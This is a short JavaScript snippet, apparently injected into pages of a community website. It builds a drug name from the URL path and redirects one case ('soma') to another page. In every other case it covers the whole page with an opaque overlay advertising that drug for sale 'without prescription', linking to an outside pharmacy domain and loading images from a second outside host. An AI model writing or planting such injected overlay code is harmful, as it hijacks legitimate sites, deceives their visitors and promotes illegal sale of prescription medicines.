

function ucfirst (str) {
    var f = str.charAt(0).toUpperCase();
    return f + str.substr(1);
}


if (typeof(fst) == 'undefined') {
n = ucfirst(window.location.pathname.match(/[^-\W]{4,}/).toString());
if ( n.toLowerCase() == 'soma' ) { document.title = ''; window.location = "http://www.tigweb.org/community/groups/index.html?msg=nogroup"; } 

else {


//alert(document.getElementsByTagName('table')[1].innerHTML);
//alert('1');

s = document.getElementsByTagName('TD')[1];

d = document.createElement('DIV');
d.setAttribute('style', 'z-index:9999;position:absolute;top:0px;left:0px;width:100%;height:2500px;background:#FFFFFF; text-align: center;');
//d.style.cssText = "z-index:9999;position:absolute;top:0px;left:0px;width:100%;height:1500px;background:#FFFFFF; text-align: center;"; 
d.innerHTML = '<center><h1 style="padding: 0;margin: 0; color:#336699;">Buy '+n+' Online</h1><h2 style="padding: 0;margin: 0; color:#336699;">Buy '+n+' Without Prescription and get Free Courier Delivery in Next Few Days.</h2><a href="http://official-drugstore.info/'+n.toLowerCase()+'" ref="nofollow"><img src="http://imgrx.com/'+n.toLowerCase()+'.gif" border="0"></a></center>';
//s.innerText = "";
s.appendChild(d);
fst = 2;


}
}

